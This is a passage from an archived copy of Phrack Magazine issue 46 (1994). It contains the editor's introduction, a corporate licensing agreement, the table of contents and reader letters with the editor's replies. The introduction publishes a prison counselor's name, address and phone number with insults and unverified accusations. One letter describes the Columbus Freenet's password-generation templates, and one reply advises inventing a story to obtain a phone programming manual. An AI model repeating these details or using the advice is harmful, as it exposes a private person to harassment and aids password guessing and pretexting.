informis/textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
278a90f7ce
textfiles/magazines/PHRACK/PHRACK46

22778 lines
973 KiB
Plaintext
Raw Normal View History

Initial commit
2021-04-15 11:31:59 -07:00
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 1 of 28
Issue 46 Index
___________________
P H R A C K 4 6
September 20, 1994
___________________
"La cotorra que chi, no canta"
Honey, I'm home! Anyway, like the little proverb above indicates, I've
been a very busy man since the last issue. I've been denied entry to
a federal prison in North Carolina (imagine the irony of THAT); I've
been whoring in the Red-Light District of Amsterdam with military
intelligence officers from England, Spain and the US; estuve chicaito en
Nuevo Lardeo; I've tested wireless networks in Canada; and I've been
on TV a few more times. (No, nimrod, Phrack is not my job...I WORK
for a living.)
Needless to say, it has been a chore for me to get Phrack out at all,
much less only a month or so past my self-imposed quarterly deadline.
But hell, I love doing this magazine, so here it is. Phrack is the only
way I can completely thrill and simultaneously piss off so many people
at once, so I don't think I'll stop any time soon.
Pissing people off. It's what I like to do, and it would appear that
I'm quite good at it. I realize that there are several extremely
vocal erikb-bashers out there. And to them I say, "smooches!"
Let's face it, sour grapes make bad whiners. But hey, "As long as they're
talking about Erikb, let 'em talk." (Sorry Mr. Ford)
Besides piecing together this issue, I've been working on getting
the WWW pages together. They still aren't 100%, but they are getting
there. By the time I finally get them together, the Phrack
Web Site should be the ultimate underground resource on the net.
Check it out: http://freeside.com/phrack.html
You may be interested in the federal prison remark from the first
paragraph. I had a meeting at IBM out in Research Triangle Park. I
figured that this would be an ideal time to go see Co/Dec who still has
several years of federal time left to serve. Co/Dec is in
the Federal Correctional Institute at Butner, North Carolina, a short
30 or so minutes from where I was staying in RTP.
Anyway, I receive the necessary forms from Co/Dec to get on the approved
visitors list, and sent them back in. After several weeks, Co/Dec said
that I still had not been added. My trip was slated for a week away, so
I called his counselor, Wilbert LeMay. Mr. LeMay told me that he never got
my forms. I then fed-ex'ed a copy (that I luckily had kept). It arrived
on Friday morning, and I was to arrive on Monday. Mr. LeMay had assured me
that it would be no problem to get me added to Co/Dec's list.
When I arrived on Monday, I called the prison to make sure the visit had
been cleared. Mr. LeMay would not return my calls. In fact, not only
would he not return any of the 5 or so calls I made, but he didn't even
bother to enter my name on the visitor list until the Wednesday after I
had already left North Carolina.
I'm sorry, but this man must be a real prick.
A bit of background on LeMay. First off, according to those on the inside,
LeMay dislikes white people. He supposedly keeps a picture of slaves
picking cotton on his desk as a constant reminder of the oppression his
people were subjected to. But perhaps working in the prison system where
you have constant view of the Aryan Brotherhood in action, I'm sure many
would begin to feel likewise. (Can't we all just get along?) Secondly,
LeMay dislikes Co/Dec. He put Co/Dec in solitary confinement for weeks
because Co/Dec had a DOS MANUAL! A fucking DOS MANUAL! You do not
put someone in the fucking hole for brushing up on the syntax for xcopy!
You put them in the hole for inciting a fucking shank war, or for stealing
food, or for punching a guard. Later, Co/Dec found himself in solitary
confinement AGAIN because he traded some smokes for telephone parts he was
going to use to fix a radio. The hole again. Not for weapons and drugs,
NO! Much worse: wires and a speaker!
The prison now considers Co/Dec a security risk, and read all OUTGOING
mail he sends. Not just the regular reading of all incoming mail
that any inmate would expect. He can't take any clases, he's had
several more days added to his sentence for "bad time served,"
and in addition, all of his phone calls are live monitored and recorded.
(A funny note, during one conversation I found that my touchtones would
control the equipment they were using to record the call. The equipment
they were using was improperly connected and gave off a terrible hum
when activated. I kept turning off the recording, and the security
officer kept having to turn it back on.)
All of this, due to Counselor Wilbert LeMay. Thanks guy.
If someone can so grossly abuse their power to completely remove the
dignity of another human being, inmate or otherwise, that person needs
to face severe disciplinary action. I'm writing the warden. Directory
Assistance says that Wilbert can be reached at:
Wilbert LeMay
701 East E St.
Butner, NC 27509
919-575-6375
Fun fact: Butner is serviced by GTE.
You know, its pretty odd that as hackers, we probably know a larger number
of ex-cons and current inmates than most people.
But anyway, on to Phrack.
This issue is pretty odd in that "The Man" has consented to write
a few syllables for us to distribute. Yes, Winn Schwartau submitted
his unique perspectives of Defcon and HOPE. It's funny how many people
left Defcon this year and ran home to find information on HIRF weapons
after hearing Winn speak. (If you've actually built one by now, email
me.)
What else? GS1, Pagers, Voice Mail, VisaNet, Area 51, Programs,
Conferences, and an incomplete university dialup list. (Putting out
an incomplete list really irritates me, but hell, its taking a LOT
longer than I expected to get some 1300 dialups without more help.
AHEM!)
Can you dig it? I knew that you could.
-------------------------------------------------------------------------
READ THE FOLLOWING
IMPORTANT REGISTRATION INFORMATION
Corporate/Institutional/Government: If you are a business,
institution or government agency, or otherwise employed by,
contracted to or providing any consultation relating to computers,
telecommunications or security of any kind to such an entity, this
information pertains to you.
You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file. Cost is $100.00 US per user for
subscription registration. Cost of multi-user licenses will be
negotiated on a site-by-site basis.
Individual User: If you are an individual end user whose use
is not on behalf of a business, organization or government
agency, you may read and possess copies of Phrack Magazine
free of charge. You may also distribute this magazine freely
to any other such hobbyist or computer service provided for
similar hobbyists. If you are unsure of your qualifications
as an individual user, please contact us as we do not wish to
withhold Phrack from anyone whose occupations are not in conflict
with our readership.
_______________________________________________________________
Phrack Magazine corporate/institutional/government agreement
Notice to users ("Company"): READ THE FOLLOWING LEGAL
AGREEMENT. Company's use and/or possession of this Magazine is
conditioned upon compliance by company with the terms of this
agreement. Any continued use or possession of this Magazine is
conditioned upon payment by company of the negotiated fee
specified in a letter of confirmation from Phrack Magazine.
This magazine may not be distributed by Company to any
outside corporation, organization or government agency. This
agreement authorizes Company to use and possess the number of copies
described in the confirmation letter from Phrack Magazine and for which
Company has paid Phrack Magazine the negotiated agreement fee. If
the confirmation letter from Phrack Magazine indicates that Company's
agreement is "Corporate-Wide", this agreement will be deemed to cover
copies duplicated and distributed by Company for use by any additional
employees of Company during the Term, at no additional charge. This
agreement will remain in effect for one year from the date of the
confirmation letter from Phrack Magazine authorizing such continued use
or such other period as is stated in the confirmation letter (the "Term").
If Company does not obtain a confirmation letter and pay the applicable
agreement fee, Company is in violation of applicable US Copyright laws.
This Magazine is protected by United States copyright laws and
international treaty provisions. Company acknowledges that no title to
the intellectual property in the Magazine is transferred to Company.
Company further acknowledges that full ownership rights to the Magazine
will remain the exclusive property of Phrack Magazine and Company will
not acquire any rights to the Magazine except as expressly set
forth in this agreement. Company agrees that any copies of the
Magazine made by Company will contain the same proprietary
notices which appear in this document.
In the event of invalidity of any provision of this agreement,
the parties agree that such invalidity shall not affect the validity
of the remaining portions of this agreement.
In no event shall Phrack Magazine be liable for consequential, incidental
or indirect damages of any kind arising out of the delivery, performance or
use of the information contained within the copy of this magazine, even
if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in
contract, tort, or any other theory of liability, exceed the agreement fee
paid by Company.
This Agreement will be governed by the laws of the State of Texas
as they are applied to agreements to be entered into and to be performed
entirely within Texas. The United Nations Convention on Contracts for
the International Sale of Goods is specifically disclaimed.
This Agreement together with any Phrack Magazine
confirmation letter constitute the entire agreement between
Company and Phrack Magazine which supersedes any prior agreement,
including any prior agreement from Phrack Magazine, or understanding,
whether written or oral, relating to the subject matter of this
Agreement. The terms and conditions of this Agreement shall
apply to all orders submitted to Phrack Magazine and shall supersede any
different or additional terms on purchase orders from Company.
_________________________________________________________________
REGISTRATION INFORMATION REQUEST FORM
We have approximately __________ users.
Enclosed is $________
We desire Phrack Magazine distributed by (Choose one):
Electronic Mail: _________
Hard Copy: _________
Diskette: _________ (Include size & computer format)
Name:_______________________________ Dept:____________________
Company:_______________________________________________________
Address:_______________________________________________________
_______________________________________________________________
City/State/Province:___________________________________________
Country/Postal Code:___________________________________________
Telephone:____________________ Fax:__________________________
Send to:
Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
-----------------------------------------------------------------------------
Enjoy the magazine. It is for and by the hacking community. Period.
Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
3L33t : Ice-9 (for helping me get this done!)
Rad Band : Green Day
News : Datastream Cowboy
Photography : The Man
Prison Consultant : Co / Dec
The Young Girl : Jane March
Motor Trend's Car
of the Year : The 2600 Van
Dickhead of the Month : Wilbert LeMay at FCI Butner
Thanks To : Szechuan Death, Carl Corey, The Shining, Dcypher
Hitman Italy, Herd Beast, Dr. Delam, Maldoror,
The Red Skull, PsychoSpy, Seven Up, Erudite, Ice Jey
Special Thanks To : Winn Schwartau
Phrack Magazine V. 5, #46, September 20, 1994. ISSN 1068-1035
Contents Copyright (C) 1994 Phrack Magazine, all rights reserved.
Nothing may be reproduced in whole or in part without written
permission of the Editor-In-Chief. Phrack Magazine is made available
quarterly to the amateur computer hobbyist free of charge. Any
corporate, government, legal, or otherwise commercial usage or
possession (electronic or otherwise) is strictly prohibited without
prior registration, and is in violation of applicable US Copyright laws.
To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
the list.
Phrack Magazine
603 W. 13th #1A-278 (Phrack Mailing Address)
Austin, TX 78701
freeside.com (Phrack FTP Site)
/pub/phrack
http://freeside.com/phrack.html (Phrack WWW Home Page)
phrack@well.sf.ca.us (Phrack E-mail Address)
or phrackmag on America Online
Submissions to the above email address may be encrypted
with the following key : (Not that we use PGP or encourage its
use or anything. Heavens no. That would be politically-incorrect.
Maybe someone else is decrypting our mail for us on another machine
that isn't used for Phrack publication. Yeah, that's it. :) )
** ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED **
Phrack goes out plaintext...you certainly can subscribe in plaintext.
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB
-----END PGP PUBLIC KEY BLOCK-----
-= Phrack 46 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 17 K
2. Phrack Loopback / Editorial 52 K
3. Line Noise 61 K
4. Line Noise 56 K
5. Phrack Prophile on Minor Threat 12 K
6. Paid Advertisement 62 K
7. Paid Advertisement (cont) 45 K
8. The Wonderful World of Pagers by Erik Bloodaxe 24 K
9. Legal Info by Szechuan Death 13 K
10. A Guide to Porno Boxes by Carl Corey 13 K
11. Unix Hacking - Tools of the Trade by The Shining 42 K
12. The fingerd Trojan Horse by Hitman Italy 32 K
13. The Phrack University Dialup List 12 K
14. A Little About Dialcom by Herd Beast 29 K
15. VisaNet Operations Part I by Ice Jey 50 K
16. VisaNet Operations Part II by Ice Jey 44 K
17. Gettin' Down 'N Dirty Wit Da GS/1 by Maldoror & Dr. Delam 25 K
18. Startalk by The Red Skull 21 K
19. Cyber Christ Meets Lady Luck Part I by Winn Schwartau 45 K
20. Cyber Christ Meets Lady Luck Part II by Winn Schwartau 42 K
21. The Groom Lake Desert Rat by PsychoSpy 44 K
22. HOPE by Erik Bloodaxe 51 K
23. Cyber Christ Bites the Big Apple by Winn Schwartau 60 K
24. The ABCs of Better Hotel Staying by Seven Up 12 K
25. AT&T Definity System 75/85 by Erudite 13 K
26. Keytrap v1.0 Keyboard Key Logger by Dcypher 35 K
27. International Scenes by Various Sources 44 K
28. Phrack World News by Datastream Cowboy 38 K
Total: 996 K
_______________________________________________________________________________
"Most hackers would have sold out their mother."
Justin Tanner Peterson
"Treason is loved of many but the traitor hated of all."
Robert Greene (1552-1592)
"They smile in your face, but all the while they want to take your place."
The O'Jays
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 2 of 28
****************************************************************************
Phrack Loopback
------------------------------------------------------------------------------
I'd like to write you about my friends cat. His name is 'Cid. Cid
loves reading, in fact he'll read just about anything, from the labels on
his cat food tins to the instructions on the "real" use of his Grafix
(incense burner :) ). Well one take, 'Cid (or was it me) was indulging
in the reason he got his moniker and mentioned that he'd like to receive
Phrack. Well i told him he could just subscribe to it and then he went
into a real sob story about how he doesn't have net access. So as a
favor to 'Cid (who really does exist, and really has tripped out on brain
blotters) i'd like to subscribe to Phrack.
[You my want to take note that Phrack can also be printed on paper.
Now, that's a lot of blotter.
You've got your subscription, now go watch some anime.]
------------------------------------------------------------------------------
I recently got a new job and shortly after beginning working there, they
decided to retool and reorganize a bit for better productivity.
While we were going through some old boxes and stuff, I came across a
little black box with the words "Demon Dialer" molded into the front of
it, it even had the (functional!) 20volt power supply.
Needless to say I was pretty happy with my find. I asked if I could have
it and since no one else there seemed to know what to make of it, mine it
was!
My only problem now... I've played around with it, and it seems to do a
lot more than what I originally thought, but the fact of the matter is..
I really haven't the foggiest idea of how to get it to REALLY work for me.
If anyone has any information, or better still, actual documentation for
a Telephonics Inc, Demon Dialer.. I'd really appreciate passing it on to me.
Also, something rater strange. The phone cable attached to it had a
normal looking 4-wire connector on one end, but the other was split to
have RJ jacks, one with the yellow-black combo and one with the
red-green. The split ends (sorry :)) were plugged into the WALL and
PHONE jacks on the demon dialer. The purpose for this perplexes me since
one's supposed to be input and one's supposed to be a passthrough for the
phone to be plugged into.
Anyway, any info would be nice. Thanks guys.
[Telephonics was one of those odd telco device manufacturers back in the
80's. They made the demon dialer (a speed dialing device), a
two-line conference box, a divertor, etc. Essentially, they provided
in hardware what the telco's were beginning to roll-out in software.
I think the line splitter you have was merely plugged into those
two jacks for storage purposes. What that probably was for was to
allow two lines to use the Demon Dialer. It was probably just reversed
when your company boxed it so it wouldn't get lost.
I'm not sure if Telephonics is still in business. A good place to
start looking for info would be comp.dcom.telecom or alt.dcom.telecom.
Another good place may be Hello Direct (800-HI-HELLO). They used to
do have Telephonics equipment available for mail-order.]
------------------------------------------------------------------------------
I saw an ad for a book called "Secrets of a SuperHacker" by Knightmare.
Supposedly it intersperses tales of his exploits with code and examples.
I have big doubts, but have you heard anything good/bad about it?
[Your doubts are well founded. I got an advance copy of that book.
Let's put it this way: does any book that contains over a dozen pages
of "common passwords" sound like ground breaking material?
This book is so like "Out of the Inner Circle" that I almost wanted
to believe Knightmare (Dennis Fiery) was really yet another
alias for Bill Landreth. Imagine "Out of the Inner Circle" with
about a hundred or more extra pages of adjectives and examples that
may have been useful years back.
The Knightmare I knew, Tom in 602, whose bust by Gail Thackeray
gave law enforcement a big buffer of the Black Ice Private BBS
and help spark the infamous LOD Hacker Crackdown, certainly didn't
have anything to do with this. In fact, the book has a kind of
snide tone to it and is so clueless, that leads me to believe it
may have been written by a cop or security type person looking to
make a quick buck.
As far as source code, well, there is a sample basic program that
tries to emulate a university login.
If you want a good book, go buy "Firewalls and Internet Security" by
Cheswick and Bellovin.]
------------------------------------------------------------------------------
Hey Chris,
I'm sure you are under a constant avalanche of requests for certain files,
so I might as well add to your frustration <grin>. I know of a program
that supposedly tracks cellular phone frequencies and displays them on
a cellmap. However, I don't know the name of the program or (obviously)
where to find this little gem. I was wondering if you could possibly
enlighten me on a way to acquire a program similar to the one I have
described. I have developed some other methods of tracking locations
of cellular calls. However my methods rely on a database and manually
mapping cellular phones, this method is strictly low tech. Of course
this would be for experimental use only, therefore it would not be used
to actually track actual, restricted, radio spectrum signals. I wouldn't
want the aether Gestapo pummeling our heads and necks.
[I don't know of anything that plots frequencies on a cellmap. How would
you know the actual locations of cells for whatever city you may
be in to plot them accurately?
There are a number of programs written to listen to forward channel messages
and tell you when a call is going to jump to another channel. The cellular
telephone experimenter's kit from Network Wizards has a lot of nice
C source that will let you write your own programs that work with their
interface to the OKI 900. I suppose you could get the FCC database
CD-ROM for your state and make note of longitude and latitude of cell sites
and make your own database for your city, and then make a truly
visual representation of a cellmap and watch calls move from cell to cell.
But I don't think there is such a thing floating around the underground
at present.
Of course the carriers have this ability, and are more than happy to make
it available to Law Enforcement (without a warrant mind you). Hi OJ!
email Mark Lottor mw@nw.com for more info about the CTEK.]
------------------------------------------------------------------------------
I saw this in a HoHoCon ad:
Top Ten Nark List
1. Traxxter
2. Scott Chasin
3. Chris Goggans
4. Aget Steal
5. Dale Drrew
6. Cliff Stoll
7. [blank]
8. Julio Fernandez
9. Scanman
10. Cori Braun
What did Chris Goggans do? Isn't he Erik Bloodaxe, the publisher of
Phrack? I sincerely doubt that the feds would have someone
working for them that puts out a publication like Phrack. It would
be way too much of an embarrassment for them. I wrote to the
editor of Phrack when I read that Agent Steal said that the publisher
of Phrack was a Fed - IN PHRACK no less. He said it was a stupid rumor.
Is there anything to support this fact? And why is there now some manhunt for
Agent Steal (at CFP the FBI was checking legs) if Steal was admittedly
their employee? The whole thing is very confusing to me. Please explain.
If Goggans isn't Bloodaxe then he'd Knight Lightning (this just came to me).
Nevertheless, what's the story here?
[First off, I think you take things a little too seriously. If you are on
a nark hunt, worry about your associates, not people you obviously
don't even know. Chris Goggans (ME) is most positively Erik Bloodaxe.
Thanks for remembering.
Agent Steal was involved with the FBI. This is a fact.
In his case, he even appeared to have some kind of immunity while trying
to gather information on other hackers like Mitnik and Poulsen. This
immunity is under scrutiny by the Bureau's own Internal Affairs (or so the
new rumors go), since Steal was pulling a fast one and committing crimes
the Bureau didn't know about to get some quick cash while he set up his
friends.
My story is a bit more convoluted. You can sum it up by saying, if you
interfere with my businesses, I'll try my best to track you down and turn
you in. I guess I am a nark.]
------------------------------------------------------------------------------
I read in the last Phrack (45) that you wanted someone to write a few
words on scrambling systems. Give me a rough outline of what you want
and I'll see if I can help :-) Basically I wrote the Black Book
(European Scrambling Systems 1,2,3,4,5 and World Satellite TV &
Scrambling Methods) and also edit Hack Watch News & Syndicated
HackWatch. They all deal with scrambling system hacks as opposed to
computer hacking & phreaking. (Things are a bit iffy here as regards
phreaking as all calls are logged but the eprom phone cards are easy
to hack) Oh yeah and another claim to fame ;-) if you can call it
that, is that I was quoted in an article on satellite piracy in
"Wired" August issue.
This Hawkwind character that you had an article from in Phrack43
sounds like a *real* hacker indeed :-> Actually there is an elite in
Ireland but it is mainly concerned with satellite hacking and that
Hawkwind character is obviously just a JAFA (Irish hacker expression
- Just Another Fu**ing Amateur). Most of the advanced telco stuff is
tested in the south of the country as Dublin is not really that
important in terms of comms - most of the Atlantic path satellite
comms gear and brains are on the south coast :-)
Actually the Hawkwind article really pissed off some people here in
Ireland - there were a few questions asked on my own bbs (Special
Projects +353-51-50143) about this character. I am not even sure if
the character is a real hacker or just a wannabe - there were no
responses from any of his addresses. SP is sort of like the neutral
territory for satellite and cable hacking information in Europe
though there are a few US callers. With the way things are going with
your new DBS DirecTv system in the US, it looks like the European
satellite hackers are going to be supplying a lot of information
(DirecTv's security overlay was developed by News Datacom - the
developers of the totally hacked VideoCrypt system here in Europe).
There telco here uses eprom phone cards. These are extremely easy to
hack (well most real hackers in .IE work on breaking satellite
scrambling systems that use smart cards) as they are only serial
eprom.
Regards
[About the satellite information: YES! Write the biggest, best
article the whole fucking hacker world has ever seen about
every aspect of satellite tv!! Personally, I'm more interested in
that than anything else anyone could possibly write (seeing as how
I'm about to buy a dish for both C and Ku).
About Hawkwind's article on hacking in Ireland: If I were to write
an article about hacking in America, it would be entirely different
than anyone else in America would write. A country is a big place.
Just because someone else's hacking experience is different than
your own, it's no reason to discredit them. However, if your
exposure to the scene in Ireland is so completely different than
Hawkwind's, I would LOVE to print it as well.]
------------------------------------------------------------------------------
The Columbus Freenet uses a password generating routine that takes the
first and last initial of the user's real name, and inserts it into a randomly
chosen template. Some of the templates are:
E(f)www5(l)
(f)22ww5(l) where f and l are first and last initials
(f)2ww97(l)
(f)2ww95(l)
and so on. There are not too many of these templates, I guess maybe 50.
I imagine most people go in and change their password right away, but
then again that's what a prudent person would do (so they probably don't).
Columbus 2600 meetings:
Fungal Mutoid-sysop of The KrackBaby BBS (614-326-3933) organized the
first 2600 meetings in Columbus, unfortunately hardly anyone shows up...
I don't know why HP is so dead in Central Ohio, but fear and paranoia
run rampant.
That's all for now...keep up with the good work!
R.U.Serius?!
[Hmmm...templates are always a bad thing. All one has to do is get the
program that generates them, and viola, you've got a pre-made dict file
for your crack program. Not very smart on the part of the Freenet,
but hacking a Freenet, is like kicking a puppy.
I hope more people go to your 2600 meetings. The ones here in Austin
kinda died out too. Maybe our cities are just lame.]
------------------------------------------------------------------------------
A complaint: That piece about McDonald's in Phrack 45 was, in a word, LAME.
Surely Phrack can do better. Maliciousness for its own sake isn't very
interesting and frankly the article didn't have any ideas that a bored
13-year-old couldn't have thought up--probably written by one.
That aside, I found some good stuff in there. Some of it was old news,
but Phrack serves an archival purpose too, so that was ok. On a more
personal note, I could really relate to your account of HoHoCon--not that
I was there, just that I have started to feel old lately even though I don't
turn 25 for another 2 days :) Sometimes I feel myself saying things like
"Why, sonny, when I was your age the Apple II was king..."
Keep up the good work, and don't let the lamers get you down.
[Thanks for the letter. I personally thought the McDonald's file was
a laugh riot. Even if it was juvenile and moronic, I wouldn't expect
anyone to analyze it and go through with anything it contained. It was
just for fun. Lighten up :)
I am glad to see that at least someone else recognizes that Phrack
is attempting to serve as an archive of our subculture, rather than just
a collection of technical info that will be outdated overnight, or a
buglist that will be rendered mostly unusable within hours of release.
There is so much going on within the community, and it is becoming such a
spectacle in the popular media, that in 20 years, we can all go back and
look at Phrack and remember the people, places, and meetings that
changed the face of the net.
Or maybe I'm just terribly lame, and either 1) refuse to put in the
good stuff, 2) don't have access to the good stuff, 3) exist only as a
puppet agent of The Man, or 4) Don't know nothin' 'bout Telco!
But you know what they say about opinions.]
----------------------------------------------------------------------------
I have a few comments on your editorial in Phrack 44 (on information
wants to be free). Thanks for voicing an opinion that is shared by many
of us. I am glad to see a public figure in the CuG with nutz enuff to
actually come out and make such a statement and mean it.
Again, thanks.
Now on the subject of hacking as a whole. Is it just me, or are the number
of losers on the increase? There have always been those who would try
and apply these skills to ripoff scams and system trashing but now that
seems to be the sole intent of many of the "hackers" I come into contact
with. What ever happened to hacking to learn more about the system. To
really hack a system (be it phone, computer), is a test of skill and
determination, and upon success you walk away with a greater understanding
of the machine and its software. Hacking is more than just knowing how
to run crack on a filched password file, or using some exploitation
scripts picked up on IRC, it is a quest for knowledge and gaining
superiority over a system by use of great skill acquired by a deliberate
effort. Once was a time when things like toll fraud (I do miss blue
boxes) were a means to an end, now they seem to be the end in itself.
Also, I am researching info on OSI comsec procedures and have found some
really interesting goodies, if you are interested in publishing
my piece when completed, let me know..
[(NOTE: This came from a .mil)
Man, I'm glad to see that people in the armed forces still have minds
of their own. Not many people would express such a thing openly.
Yes, the destructive/profit-motivated trends of many of the hackers of
today are pretty sad. But you have to realize, as the technology
becomes more and more like consumer electronics, rather than the
traditional mold of computer as scientific research tool, an entirely
different market segment will be exposed to it and use the technology
for less than scrupulous means.
Even the act of hacking itself. Today, I can basically gain access
to any model of system known to man by asking. I realize that
there are many who cannot accomplish such a thing, but with the
proliferation of public access sites, almost everyone can afford
access to the net to explore and learn. The point comes down to this:
if you have an account on a Sun, why do you need an account on a Sun
at Boeing, unless you either 1) want to sell the cad files of the 777 to
Airbus or McDonnell-Douglas 2) want to get financial information to
make a killing on Wall Street, or 3) just want to have an ego boost
and say "I OWN BOEING!"
Personally, I can understand the ego boost aspect, but I've decided that
I'd much rather get paid by a company like Boeing to hack for them
than against them. I don't want to sell anyone's info, so hacking
into any company is basically useless to me, unless they are paying me
to look for potential weaknesses.
Granted, it's not an easy market to get into, but it's a goal to
shoot for.
And for those who find it impossible to quit due to fear of losing
their edge, check out my editorial in this issue for a possible
solution.]
------------------------------------------------------------------------------
I am looking for a Macintosh app that does the same thing as an app
called "Demon Dial" that has been lost in the annals of software
history due to the fact that some people (sysops) question whether it
is illegal software (it dials up a series of phone #'s looking for data
connections). Do you know where I could find an application for the Mac
that does this simple function?
[We had a guy ask in an earlier issue for Macintosh hacking/phreaking
apps. Noone responded. Hell, I know SOMEONE has to use a Mac
out there. Are you Mac-weenies all embarrassed to speak up?
Hell, uuencode and email me your aps, and I'll put them up for
ftp! Help out your poor fellow Macintosh users. I certainly
would if I could, but the thought of touching a Mac gives me the
chills.]
------------------------------------------------------------------------------
Have you ever heard of being denied access to your own cell phone?
I am currently in the process of buying a cell phone and was informed
that I COULD NOT have the programming guide of the security code
they enter to program my phone. In my opinion the key word is "MY."
If I get a digital security system for my house you better damn well
figure I will have the security codes for that. The phone was a Motorola
flip phone. I called Motorola and explained how displeased I was with
this company and they said they could not interfere with a reps. policy.
When I was selling car phone we kept the programming guide unless they
asked for it. I demanded it and they laughed in my face. Who said
"the customer is always right" anyway?
Thanks, any info is greatly appreciated. By the way, you wouldn't
happen to have the CN/A number for 815 would you? Also, any ANAC
would be very helpful.
[Well, I hate to say it, but you got typical service from your
cellular agent. Let's face it, these sales reps probably knew
about as much about that programming manual as I do nuclear
physics: "Its confusing, but if you understand it, you can fuck
things up."
I am surprised that Motorola wouldn't sell you the book though.
Motorola will sell anybody anything. You probably called the wrong
place. Moto is so huge they've got multiple groups working on somewhat
similar technologies with absolutely no communication between the groups.
Sometimes they are in different countries, but sometimes they are in the
same city! I would suggest you call a local FAE (Field Applications
Engineer)
and get them to get the book for you. Make up some story about
working on some computer controlled application with the phone, and that
you need any and all documentation on the phone. They'll do it. Money
is money.
As far as the 815 CNA, hell, just call the business office. I haven't
called a CNA in years, only the business office. They are nice people.
And no PINs.
815 ANAC: ok guys, someone must have one...email it!
"The customer is always right" wasn't in Bartlett's or Columbia's
books of famous quotations. I guess that phrase has been written out of out
history. So, from now on you aren't always right, I guess.]
------------------------------------------------------------------------------
Dear Phrack:
We want you!
We want you to be a part of our cutting edge documentary that is traversing
across the "NEW EDGE" of computers, culture, and chaos.
Working in conjunction with Douglas Rushkoff, the best selling author of
"CYBERIA," we are currently gathering together the leaders of this
technological and cultural revolution. This is not a documentary in the
traditional sense of the word. It is more of an exploration, a journey, a
unique vision of the world as seen through the eyes of those who live on the
bleeding edge; where technology, art, science, music, pleasure, and new
thoughts collide. A place people like you and me like to call home.
"New Edge" will deliver a slice of creativity, insanity, and infallibility,
and feed those who are hungry for more than what Main Street USA has to
offer. This project will detonate across the US and around the world. It
will become the who's who of the new frontier and you belong on it's
illustrious list of futurians. Please look over the enclosed press release
description of the project.
Phrack has long been the ultimate source for hack/phreak info, and helped to
push the limits of free speech and information. The role that Phrack has
played in the Steve Jackson Games Case set an important precedent for
CyberLaw. We will also be interviewing several people from the EFF.
Please call me ASAP to schedule an interview for "New Edge", or send me
E-Mail.
Sincerely,
Todd LeValley
Producer, N E W E D G E
(310) 545-8138 Tel/Fax
belief@eworld.com
W E L C O M E
T O T H E
W O R L D
O N T H E
E D G E O F
T H E F U T U R E
W E L C O M E
T O T H E
N E W E D G E
-the documentary-
T h e O r g a n i z a t i o n
Belief Productions in association with Film Forum.
T h e M i s s i o n
Journey through the labyrinth of cyberia and experience the people, places
and philosophy that construct cyberspace and the shores of the technological
frontier. This fast paced visual voyage through the digital revolution will
feature interviews with the innovators, artists, cyberpunks, and visionaries
from all sides of the planet. These specialists are the futurists who are
engineering our cybergenic tomorrow in laboratories today. Along the way we
will investigate the numerous social and political issues which are cropping
up as each foot of fiber optic cable is laid. Artificial intelligence, the
Internet, nanotechnology, interactive media, computer viruses, electronic
music, and virtual reality are just a few of the many nodes our journey will
explore.
T h e F u n d i n g
This exploration is sponsored in part by a grant from The Annenberg
Foundation in association with the LA based non-profit cutting-edge media
group Film Forum.
T h e P r o c e s s
The New Edge project will capture moving images with a variety of input
devices and then assemble them into one fluid documentary using Apple
Macintosh Quadras & PowerMac computers. The post production work will be
done entirely on the computers using the Radius Video Vision Telecast Board
in conjunction with Quicktime software applications such as Adobe Premiere
4.0 and CoSA After Effects 2.01. The final piece will be recorded to BETACAM
SP videotape for exhibition and distribution. The capture formats for the
project will include: BETACAM SP, Super VHS, Hi-8, 16MM Film, Super-8 Film,
35MM Stills, and the Fisher
Price Pixelvision 2000.
T h e R e s u l t s
New Edge will pride itself on an innovative visual and aural style which
before today, could only be created on high-end professional video systems
and only for short format spots. The New Edge documentary will be two hours
in length and will have a dense, layered look previously featured only in
much shorter pieces. New Edge will be a showcase piece not only for the
content contained within, but for the way in which the piece was produced.
It will be a spectacular tribute to the products and technology involved in
its creation.
D i s t r i b u t i o n
Direct Cinema - Distributes videos to Libraries, Schools, and Universities
throughout the United States.
Mico Entertainment/NHK Enterprises - Provider of American programming for
Japanese Television.
Labyrinth Media Ltd. - European reality-based documentary distributor
T h e A u d i e n c e
New Edge is aimed at both the technophiles and technophobes alike. While the
show will feature very complex and sophisticated topics, the discussions will
be structured to appeal to both those who do and do not have the technical
framework that underlines the cyberian movement. The show's content and
style will make it readily available to the MTV and Generation X demographic
groups as well as executives who want to stay on top of the latest
technological advances. Individuals who read Mondo 2000 and Wired magazine
will also naturally latch on to this electronic
presentation of their favorite topics.
T h e G u i d e s
Mike Goedecke - Director/Graphic Designer
Mike was the Writer/Director/Cinematographer for the Interplay CD-ROM game
entitled Sim City. Acting as graphic designer for the Voyager Co.- Criterion
Laser Disc Division his work is featured on titles such as: Akira, DEVO-The
Truth About De-Evolution, The Adventures of Baron Munchausen, and Spartacus.
Most recently he collaborated with Los Angeles Video Artist Art Nomura on a
video installation piece entitled Digital Mandala. The piece was edited,
composited , and mastered to Laser Disc using an Apple Macintosh Computer and
off-the-shelf software. The installation is scheduled to tour museums and
art galleries across the United States and Europe. While attending
Cinema/Television Graduate School at the University of Southern California,
Mike directed the award winning documentary short Rhythm, which celebrates
various musical cultures.
Todd LeValley - Producer/Graphic Designer
